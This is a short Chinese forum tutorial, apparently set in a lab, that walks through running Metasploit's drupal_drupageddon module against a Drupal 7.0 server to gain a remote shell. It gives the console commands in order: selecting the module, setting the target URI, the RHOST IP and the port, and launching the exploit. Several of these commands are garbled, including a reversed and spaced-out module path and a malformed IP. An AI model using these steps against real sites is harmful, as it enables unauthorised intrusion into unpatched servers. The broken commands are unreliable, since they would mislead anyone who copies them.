使用HTTP参数键/值SQL注入利用Drupal

此模块利用Drupal HTTP参数键/值SQL注入(也称为Drupageddon),以便在易受攻击的实例上实现远程shell。该模块针对Drupal 7.0和7.31进行了测试(在7.32中已修复)。
利用目标
Drupal 7.0
需求
攻击者:kali Linux
受害者PC:Drupal 7.0
打开Kali终端类型  msfconsole


现在输入  exploit use / multi / http / drupal_drupageddon
msf exploit  (drupal_drupageddon)> set targeturi / drupal /
msf exploitdrupal_drupageddon)> set rhost 192.168.0.10 9 (远程主机的IP)
msf exploitdrupal_drupageddon)> set rport 80
msf exploitdrupal_drupageddon)> exploit  

转载请注明本文链接: http://www.mayidui.net/t2415.html
游客
登录后才可以回帖,登录 或者 注册